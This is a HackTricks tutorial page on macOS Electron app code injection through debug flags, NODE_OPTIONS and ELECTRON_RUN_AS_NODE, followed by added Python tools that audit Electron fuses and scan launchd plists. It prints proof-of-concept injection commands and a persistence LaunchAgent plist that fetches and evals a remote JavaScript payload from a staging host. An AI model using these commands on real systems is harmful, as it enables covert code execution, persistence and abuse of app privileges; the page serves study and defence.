# macOS Electron Application Injection

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**Telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**.**

</details>

## Adding code to Electron applications
The JS code of an Electron application is not signed, so an attacker could move the application to a writable location, inject malicious JS code and launch it to abuse its TCC permissions.

However, modifying the application requires the **`kTCCServiceSystemPolicyAppBundles`** permission, which is no longer allowed by default.

## Inspecting Electron applications
According to [**this post**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), if you run an Electron application with flags such as **`--inspect`**, **`--inspect-brk`** and **`--remote-debugging-port`**, a **debug port** is opened that you can connect to (for example from `chrome://inspect` in Chrome) and from which you can **inject code** or launch new processes.\
For example:

{% code overflow="wrap" %}
```bash
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
# Connect to it using chrome://inspect and execute a calculator with:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
```
{% endcode %}

{% hint style="danger" %}
Note that **hardened** Electron applications now ignore Node parameters (such as --inspect) at launch unless the environment variable **`ELECTRON_RUN_AS_NODE`** is set.

However, you could still use the Electron argument `--remote-debugging-port=9229`, but the previous payload won't work to execute other processes.
{% endhint %}
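A way to check whether a given Electron build still honours these vectors, as an added example that is not part of the original page or of the Electron project: it parses the fuse wire that Electron embeds in its framework binary, using the layout the `@electron/fuses` tool documents (a sentinel string, a version byte, a length byte, then one ASCII byte per fuse in `FuseV1Options` order). The framework path inside the bundle and the two sample wires are assumptions constructed for the example; on a real bundle, `npx @electron/fuses read --app <path>` is the authoritative reader.

```python
from pathlib import Path

# Sentinel that precedes the fuse wire in an Electron binary (per @electron/fuses).
SENTINEL = b"dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX"
# FuseV1Options order from @electron/fuses; a fuse's wire index is its position here.
FUSES_V1 = [
    "RunAsNode",                             # honours ELECTRON_RUN_AS_NODE
    "EnableCookieEncryption",
    "EnableNodeOptionsEnvironmentVariable",  # honours NODE_OPTIONS
    "EnableNodeCliInspectArguments",         # honours --inspect / --inspect-brk
    "EnableEmbeddedAsarIntegrityValidation",
    "OnlyLoadAppFromAsar",
    "LoadBrowserProcessSpecificV8Snapshot",
    "GrantFileProtocolExtraPrivileges",
]
STATE = {0x30: "off", 0x31: "on", 0x72: "removed"}  # ASCII '0', '1', 'r'

def read_fuses(blob: bytes) -> dict:
    """Parse the fuse wire out of a binary image into {fuse name: state}."""
    pos = blob.find(SENTINEL)
    if pos < 0:
        raise ValueError("no Electron fuse sentinel found (not an Electron binary?)")
    pos += len(SENTINEL)
    version, length = blob[pos], blob[pos + 1]
    if version != 1:
        raise ValueError(f"unsupported fuse wire version {version}")
    wire = blob[pos + 2:pos + 2 + length]
    return {name: STATE.get(b, "unknown") for name, b in zip(FUSES_V1, wire)}

def open_vectors(fuses: dict) -> list:
    """Which of the injection vectors discussed on this page the build still honours."""
    checks = [
        ("RunAsNode", "ELECTRON_RUN_AS_NODE"),
        ("EnableNodeOptionsEnvironmentVariable", "NODE_OPTIONS"),
        ("EnableNodeCliInspectArguments", "--inspect/--inspect-brk"),
    ]
    return [vector for fuse, vector in checks if fuses.get(fuse) == "on"]

def audit_app(app_path: str) -> list:
    """Audit a macOS bundle; the framework binary location is an assumption."""
    binary = Path(app_path, "Contents/Frameworks/Electron Framework.framework/Electron Framework")
    return open_vectors(read_fuses(binary.read_bytes()))

# Constructed sample wires (not real binaries): an unhardened build and a hardened one.
UNHARDENED = b"\x00" * 16 + SENTINEL + bytes([1, 8]) + b"10110001" + b"\x00" * 8
HARDENED = b"\x00" * 16 + SENTINEL + bytes([1, 8]) + b"00001100" + b"\x00" * 8
```

`audit_app("/Applications/Foo.app")` runs the same check against an installed bundle; an empty list means none of the three vectors above is honoured.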
## `NODE_OPTIONS`

{% hint style="warning" %}
This environment variable only works if the Electron application allows it. If the application has been hardened, you will also need the environment variable **`ELECTRON_RUN_AS_NODE`**.
{% endhint %}

With this combination you can store the payload in a separate file and execute it:

{% code overflow="wrap" %}
```bash
# Content of /tmp/payload.js
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')

# Execute
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
```
{% endcode %}

## `ELECTRON_RUN_AS_NODE` <a href="#electron_run_as_node" id="electron_run_as_node"></a>

According to [**the docs**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), if this environment variable is set, the process starts as a normal Node.js process.

{% code overflow="wrap" %}
```bash
# Run this
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
# Then from the nodeJS console execute:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
```
{% endcode %}

As [**proposed here**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), you could abuse this environment variable in a plist to maintain persistence:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>EnvironmentVariables</key>
    <dict>
        <key>ELECTRON_RUN_AS_NODE</key>
        <string>true</string>
    </dict>
    <key>Label</key>
    <string>com.xpnsec.hideme</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Slack.app/Contents/MacOS/Slack</string>
        <string>-e</string>
        <string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
```
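A defender-side check for the persistence technique above, as an added example not taken from the original page or the referenced post: it parses launchd plists with the standard-library `plistlib` and flags jobs that launch an app-bundle binary with the `ELECTRON_RUN_AS_NODE`/`NODE_OPTIONS` environment variables or with the injection flags discussed on this page. The two embedded plists are constructed samples; the script body in the first is a placeholder.

```python
import plistlib
from pathlib import Path

# Indicators from this page: env vars that turn an Electron app into a Node runner,
# and launch arguments that inject or expose code.
ENV_INDICATORS = {"ELECTRON_RUN_AS_NODE", "NODE_OPTIONS"}
ARG_INDICATORS = {"--inspect", "--inspect-brk", "--remote-debugging-port", "-e", "--require"}

def scan_launch_plist(data: bytes) -> list:
    """Findings for one launchd plist; an empty list means nothing suspicious."""
    job = plistlib.loads(data)
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    program = args[0]
    findings = []
    env = job.get("EnvironmentVariables", {})
    for name in sorted(ENV_INDICATORS & set(env)):
        findings.append(f"env {name}={env[name]!r}")
    if "/Contents/MacOS/" in program:  # only app-bundle binaries take these flags
        for arg in args[1:]:
            if arg.split("=", 1)[0] in ARG_INDICATORS:
                findings.append(f"arg {arg[:40]!r}")
    if findings:
        findings.insert(0, f"label {job.get('Label', '?')} -> {program}")
    return findings

def scan_directory(path: str) -> dict:
    """Map each flagged .plist in a LaunchAgents/LaunchDaemons dir to its findings."""
    found = {str(p): scan_launch_plist(p.read_bytes()) for p in Path(path).glob("*.plist")}
    return {k: v for k, v in found.items() if v}

# Constructed samples modelled on the plist above; the script body is a placeholder.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>EnvironmentVariables</key>
  <dict><key>ELECTRON_RUN_AS_NODE</key><string>true</string></dict>
  <key>Label</key><string>com.example.constructed</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Slack.app/Contents/MacOS/Slack</string>
    <string>-e</string><string>/* constructed placeholder */</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array><string>/usr/bin/true</string></array>
</dict></plist>"""
```

`scan_directory(str(Path.home() / "Library/LaunchAgents"))` applies the same check to a user's installed agents.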